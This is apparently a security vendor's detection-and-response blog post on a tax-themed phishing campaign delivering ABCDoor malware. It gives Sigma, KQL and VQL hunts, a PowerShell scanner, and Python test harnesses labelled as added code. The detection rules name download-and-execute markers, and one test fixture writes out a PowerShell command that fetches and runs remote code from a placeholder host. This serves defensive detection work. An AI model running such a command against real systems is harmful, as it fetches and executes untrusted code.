
Silver Fox ABCDoor Malware Campaign: Detection and Response for India/Russia Tax Phishing

Security Arsenal Team
May 4, 2026
6 min read

The China-nexus threat actor known as Silver Fox has resurfaced with a sophisticated campaign actively targeting organizations in India and Russia. Utilizing a new malware family designated ABCDoor, the group relies on highly convincing tax-themed social engineering lures—specifically impersonating the Income Tax Department of India—to deliver its payload.

Given the campaign's active status and the high-value targets involved, defenders must immediately elevate their detection posture. This is not a theoretical risk; it is an active intrusion attempt leveraging the urgency of tax compliance to bypass user skepticism.

Technical Analysis

Threat Actor: Silver Fox (China-based)
Target Geography: India, Russia
Malware Family: ABCDoor (New Variant)
Attack Vector: Social Engineering / Phishing Email

Attack Chain Breakdown

  1. Initial Access: The campaign begins with a phishing email designed to mimic official correspondence. In the Indian wave, attackers spoofed the Income Tax Department. While specific attachments weren't detailed in the source, similar Silver Fox campaigns typically utilize ISO files, HTML smuggling, or malicious Office documents with macros.
  2. Execution: Once the user interacts with the lure (e.g., opening an attachment), the payload drops and executes the ABCDoor malware.
  3. Payload Capabilities: ABCDoor functions as a backdoor, granting the threat actor remote access to the infected host. This allows for further lateral movement, data exfiltration, or deployment of secondary payloads such as ransomware or spyware.
  4. C2 Communications: The malware establishes a command-and-control (C2) channel to receive instructions.

Exploitation Status: Confirmed Active Exploitation (In-the-wild).

Detection & Response

The following detection rules and queries are designed to identify the specific TTPs (Tactics, Techniques, and Procedures) associated with this Silver Fox campaign, focusing on the social engineering vector and the subsequent execution of ABCDoor.

SIGMA Rules

---
title: Silver Fox Tax-Themed Phishing Email Indicators
id: 8a1b2c3d-4e5f-6789-0123-456789abcdef0
status: experimental
description: Detects emails with subject lines mimicking tax authorities (India/Russia) often associated with Silver Fox campaigns delivering ABCDoor.
references:
  - https://thehackernews.com/2026/05/silver-fox-deploys-abcdoor-malware-via.html
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.initial_access
  - attack.t1566.001
logsource:
  product: email
  category: header
detection:
  selection_keywords:
    Subject|contains:
      - 'Income Tax'
      - 'Tax Department'
      - 'Notice of Assessment'
      - 'Tax Refund'
      - 'Federal Tax Service'
  selection_suspicious_ext:
    AttachmentFileExtensions|contains:
      - '.iso'
      - '.exe'
      - '.dll'
      - '.js'
      - '.vbs'
  condition: selection_keywords and selection_suspicious_ext
falsepositives:
  - Legitimate tax correspondence (rarely contains dangerous attachments)
level: high
---
title: Suspicious Process Spawn via Office Applications
id: 9b2c3d4e-5f6a-7890-1234-56789abcdef0
status: experimental
description: Detects Office applications spawning suspicious child processes typical of macro-dropping or template-injection techniques used to install malware like ABCDoor.
references:
  - https://attack.mitre.org/techniques/T1566/001/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1204.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\POWERPNT.EXE'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\mshta.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  selection_cli:
    CommandLine|contains:
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'FromBase64String'
  condition: selection_parent and selection_child and selection_cli
falsepositives:
  - Legitimate macro usage (rarely uses obfuscated PowerShell)
level: high
---
title: ABCDoor Potential C2 Traffic Pattern
id: 0c1d2e3f-4a5b-6789-2345-67890abcdef0
status: experimental
description: Detects regsvr32, rundll32 or powershell making outbound network connections to hosts outside a small allowlist, a living-off-the-land pattern that can indicate Silver Fox/ABCDoor C2 or payload staging. The rule is intentionally broad; extend filter_legit with your environment's known-good destinations before enabling it.
references:
  - Internal Threat Intelligence
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Image|endswith:
      - '\regsvr32.exe'
      - '\rundll32.exe'
      - '\powershell.exe'
  filter_legit:
    DestinationHostname|contains:
      - '.microsoft.com'
      - '.windowsupdate.com'
      - '.gov.in'
      - '.gov.ru'
  condition: selection and not filter_legit
falsepositives:
  - Rare legitimate system updates via these binaries
level: medium
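To show what the first two rules above actually match, here is an added Python harness (not code from the original post or from the Security Arsenal team) that re-implements their selection logic with Sigma's case-insensitive `contains` and `endswith` semantics and runs it over constructed sample email and process-creation events. The event field names, the attachment list shape, the sample command lines and the `placeholder.invalid` URL are assumptions.

```python
"""Added example: re-implements the selection logic of the two Sigma rules above
and applies it to constructed sample events. Not code from the original post."""

# Keyword lists copied from the rules above
TAX_SUBJECTS = ("Income Tax", "Tax Department", "Notice of Assessment",
                "Tax Refund", "Federal Tax Service")
RISKY_EXTS = (".iso", ".exe", ".dll", ".js", ".vbs")
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\powerpnt.exe")
SCRIPT_HOSTS = ("\\powershell.exe", "\\cmd.exe", "\\mshta.exe",
                "\\wscript.exe", "\\cscript.exe")
CLI_MARKERS = ("Invoke-Expression", "DownloadString", "FromBase64String")


def contains_any(value, needles):
    """Sigma's |contains modifier is case-insensitive, so compare lowercased."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def ends_with_any(value, suffixes):
    """Sigma's |endswith modifier, also case-insensitive."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def match_tax_phish(email):
    """Rule 1: tax keyword in Subject AND a risky attachment extension.
    Assumption: the event carries a list of attachment file names."""
    return (contains_any(email.get("Subject", ""), TAX_SUBJECTS)
            and any(ends_with_any(n, RISKY_EXTS)
                    for n in email.get("Attachments", [])))


def match_office_spawn(proc):
    """Rule 2: Office parent AND script-host child AND download/decode keyword."""
    return (ends_with_any(proc.get("ParentImage", ""), OFFICE_PARENTS)
            and ends_with_any(proc.get("Image", ""), SCRIPT_HOSTS)
            and contains_any(proc.get("CommandLine", ""), CLI_MARKERS))


# Constructed sample events (not real telemetry)
SAMPLE_EMAILS = [
    {"Subject": "Income Tax Department: Notice of Assessment AY 2025-26",
     "Attachments": ["ITR_Notice.iso"]},                    # should fire
    {"Subject": "Income Tax refund status",
     "Attachments": ["refund_status.pdf"]},                 # keyword, but safe extension
    {"Subject": "Team lunch on Friday",
     "Attachments": ["installer.exe"]},                     # extension, but no keyword
]
SAMPLE_PROCS = [
    {"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/x')\""},  # should fire
    {"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},                      # no download/decode marker
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -c [Convert]::FromBase64String('QUFB')"},  # non-Office parent
]


def run_rules(emails, procs):
    """Return the indexes of the events each rule would alert on."""
    return {"tax_phish": [i for i, e in enumerate(emails) if match_tax_phish(e)],
            "office_spawn": [i for i, p in enumerate(procs) if match_office_spawn(p)]}


if __name__ == "__main__":
    print(run_rules(SAMPLE_EMAILS, SAMPLE_PROCS))  # {'tax_phish': [0], 'office_spawn': [0]}
```

Running the harness against your own exported events before deploying the rules is a cheap way to confirm the field mapping (Subject, attachment names, ParentImage) in your SIEM matches what the rules expect; the second and third samples in each list show the two ways a near-miss stays silent.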

KQL (Microsoft Sentinel / Defender)

// Hunt for tax-themed emails with attachments.
// EmailEvents only carries AttachmentCount; attachment names live in
// EmailAttachmentInfo and are joined on NetworkMessageId.
EmailEvents
| where Timestamp > ago(30d)
| where Subject has_any ("Income Tax", "Tax Department", "Tax Refund", "Federal Tax")
| where AttachmentCount > 0
| join kind=inner (
    EmailAttachmentInfo
    | project NetworkMessageId, FileName, FileType
  ) on NetworkMessageId
| extend TaxIndicators = case(Subject has "Income", "Income Tax Impersonation",
                              Subject has "Refund", "Refund Scam",
                              "Other Tax Theme")
| project Timestamp, Subject, SenderFromAddress, RecipientEmailAddress, FileName, FileType, TaxIndicators

// Hunt for suspicious child processes spawned by Office apps.
// Filter on the command line before projecting so the column is still available.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "powerpnt.exe")
| where FileName in~ ("powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe")
| where ProcessCommandLine contains "Download" or ProcessCommandLine contains "Encoded"
| project Timestamp, DeviceName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, AccountName

Velociraptor VQL

// Hunt for suspicious Office-spawned processes.
// pslist() exposes Ppid but no Parent object, so the parent is resolved with a
// second pslist(pid=...) call inside foreach(); child columns are aliased so they
// are not shadowed by the parent's Pid/Name.
SELECT * FROM foreach(
  row={
    SELECT Pid AS ChildPid, Ppid, Name AS ChildName,
           CommandLine AS ChildCommandLine, Username AS ChildUser
    FROM pslist()
    WHERE Name =~ "(?i)^(powershell|cmd|mshta|wscript)\\.exe$"
  },
  query={
    SELECT ChildPid, ChildName, ChildCommandLine, ChildUser,
           Pid AS ParentPid, Name AS ParentName
    FROM pslist(pid=Ppid)
    WHERE Name =~ "(?i)^(WINWORD|EXCEL|POWERPNT)\\.EXE$"
  })

// Hunt for tax-themed lure files in user directories.
// glob() returns OSPath and Name (not FullPath/FileName); forward slashes avoid
// backslash escaping inside the VQL string. now() is Unix seconds, so compare
// against Mtime.Unix.
SELECT OSPath, Name, Size, Mtime, Btime
FROM glob(globs="C:/Users/*/Downloads/*")
WHERE Name =~ "(?i)(tax|income|refund|notice|department)"
  AND Name =~ "(?i)\\.(iso|exe|dll|js|vbs|docm|xlsm)$"
  AND Mtime.Unix > now() - 90 * 86400

Remediation Script (PowerShell)

<#
.SYNOPSIS
    Incident Response script to hunt for and quarantine artifacts related to Silver Fox ABCDoor tax-themed lures.
.DESCRIPTION
    Scans user directories for files matching the naming convention of the phishing campaign and checks for suspicious running processes.
    Deletion is disabled by default; review the hits before enabling it.
#>

# Define suspicious keywords (joined into one regex) and extensions
$Keywords = @("Income Tax", "Tax Refund", "Notice", "Assessment", "Federal Tax")
$KeywordPattern = ($Keywords | ForEach-Object { [regex]::Escape($_) }) -join '|'
$Extensions = @(".exe", ".iso", ".dll", ".vbs", ".js", ".docm", ".xlsm", ".zip")
$UserFolders = @("C:\Users\*\Downloads", "C:\Users\*\Desktop", "C:\Users\*\Documents")
$Cutoff = (Get-Date).AddDays(-90)

Write-Host "[*] Starting hunt for Silver Fox artifacts..." -ForegroundColor Cyan

# Scan for suspicious files
foreach ($Folder in $UserFolders) {
    if (Test-Path $Folder) {
        Write-Host "[*] Scanning $Folder..." -ForegroundColor Gray
        Get-ChildItem -Path $Folder -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object {
            # $_ is the file here; the original nested Where-Object rebound $_ to the keyword
            ($_.LastWriteTime -gt $Cutoff) -and
            ($_.Extension -in $Extensions) -and
            ($_.BaseName -match $KeywordPattern)
        } | ForEach-Object {
            Write-Host "[!] SUSPICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
            # Optional: Remove file (Uncomment below to enable deletion)
            # Remove-Item -Path $_.FullName -Force
        }
    }
}

# Check for suspicious process relationships.
# Win32_Process carries ParentProcessId and Name with the ".exe" suffix, and works on
# Windows PowerShell 5.1 as well as PowerShell 7. Get-Process only exposes .Parent on
# PowerShell 7 and its ProcessName has no ".exe", so the original comparison never matched.
$suspiciousParents = @("winword.exe", "excel.exe", "powerpnt.exe")
$suspiciousChildren = @("powershell.exe", "cmd.exe", "mshta.exe")

Write-Host "[*] Checking for suspicious process chains..." -ForegroundColor Gray
$allProcs = Get-CimInstance -ClassName Win32_Process
$byPid = @{}
foreach ($p in $allProcs) { $byPid[[int]$p.ProcessId] = $p }

$allProcs | Where-Object { $suspiciousChildren -contains $_.Name } | ForEach-Object {
    # Note: a parent PID can be reused after the parent exits; confirm with process start times if in doubt
    $parent = $byPid[[int]$_.ParentProcessId]
    if ($parent -and $suspiciousParents -contains $parent.Name) {
        Write-Host "[!] ALERT: $($parent.Name) (PID: $($parent.ProcessId)) spawned $($_.Name) (PID: $($_.ProcessId))" -ForegroundColor Red
    }
}

Write-Host "[*] Scan complete." -ForegroundColor Green

Remediation

  1. Block Email Indicators: Immediately update Secure Email Gateway (SEG) rules to block or sandbox emails containing subject lines referencing "Income Tax," "Tax Refund," or "Notice" originating from external, non-whitelisted domains.
  2. User Awareness: Mobilize the security awareness team immediately. Send a high-priority alert to staff in India and Russia regions regarding the ongoing tax-themed phishing campaign. Instruct users to report, not open, these emails.
  3. Endpoint Isolation: If ABCDoor infection is confirmed via the detection logic above, isolate affected endpoints from the network immediately to prevent lateral movement.
  4. Indicator Enrichment: While specific IoCs (hashes, IPs) were not disclosed in the summary, hunt for file creations in C:\Users\Public\ or %TEMP% following the execution of Office applications.
  5. Review Proxy/DNS Logs: Look for anomalous connections from internal endpoints to domains registered within the last 30 days, particularly those utilizing non-standard TLDs or high-entropy domain names.
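Step 5 asks for a hunt over proxy/DNS logs for recently registered domains, unusual TLDs and high-entropy names. The following Python triage script is an added example, not part of the original post or the Security Arsenal tooling: it parses constructed proxy log lines, extracts the registrable domain using a deliberately tiny stand-in for the public suffix list, computes the Shannon entropy of the second-level label, and checks a constructed registration-date table (standing in for an RDAP lookup or a newly-registered-domain feed) against the 30-day window from step 5. The entropy threshold, the "common TLD" set, the suffix list, the sample domains and their registration dates are all assumptions.

```python
"""Added example: triage of proxy/DNS log lines for step 5 above (uncommon TLD,
high-entropy label, newly registered domain). Not code from the original post."""
import math
import re
from collections import Counter
from datetime import date

COMMON_TLDS = {"com", "net", "org", "in", "ru", "gov", "edu", "io"}  # assumption
MULTI_LABEL_SUFFIXES = {"gov.in", "co.in", "gov.ru", "com.ru"}        # tiny constructed stand-in for the PSL
ENTROPY_THRESHOLD = 3.5                                              # assumption, tune per environment
NRD_DAYS = 30                                                        # window from step 5
TODAY = date(2026, 5, 4)                                             # fixed so the example is deterministic

# Constructed registration dates (stand-in for an RDAP/NRD feed)
REGISTRATION_DATES = {
    "example-tax-portal.xyz": date(2026, 4, 20),
    "incometax.gov.in": date(2001, 1, 1),
    "microsoft.com": date(1991, 5, 2),
}

# Constructed proxy log lines (not real traffic)
SAMPLE_LOG = """\
2026-05-04T09:12:01Z host=WS-IN-042 dst=incometax.gov.in proto=https
2026-05-04T09:12:44Z host=WS-IN-042 dst=example-tax-portal.xyz proto=https
2026-05-04T09:13:02Z host=WS-RU-017 dst=q7z2kx9f3mlv.top proto=https
2026-05-04T09:13:30Z host=WS-IN-042 dst=www.microsoft.com proto=https
"""
LINE_RE = re.compile(r"host=(\S+)\s+dst=(\S+)")


def shannon_entropy(s):
    """Bits per character of the label; random-looking DGA-style labels score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable(fqdn):
    """Registrable domain: last two labels, or three when the tail is a known
    multi-label suffix such as gov.in (simplification of the public suffix list)."""
    labels = fqdn.lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def score(fqdn):
    """Return the list of reasons a destination deserves analyst attention."""
    reasons = []
    reg = registrable(fqdn)
    tld = reg.rsplit(".", 1)[-1]
    if tld not in COMMON_TLDS:
        reasons.append("uncommon_tld")
    if shannon_entropy(reg.split(".")[0]) >= ENTROPY_THRESHOLD:
        reasons.append("high_entropy")
    registered = REGISTRATION_DATES.get(reg)          # unknown domains are not flagged as NRD
    if registered is not None and (TODAY - registered).days <= NRD_DAYS:
        reasons.append("newly_registered")
    return reasons


def triage(log_text):
    """Parse log lines and return (host, destination, reasons) for flagged entries."""
    flagged = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        host, dst = m.groups()
        reasons = score(dst)
        if reasons:
            flagged.append((host, dst, reasons))
    return flagged


if __name__ == "__main__":
    for host, dst, reasons in triage(SAMPLE_LOG):
        print(f"{host} -> {dst}: {', '.join(reasons)}")
```

In the sample, the legitimate incometax.gov.in and microsoft.com destinations pass untouched, while the look-alike tax portal is flagged for its TLD and 14-day-old registration and the random-looking .top domain for its TLD and entropy. Replace REGISTRATION_DATES with a real RDAP or NRD lookup and swap the suffix stand-in for the full public suffix list before using this on production logs.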
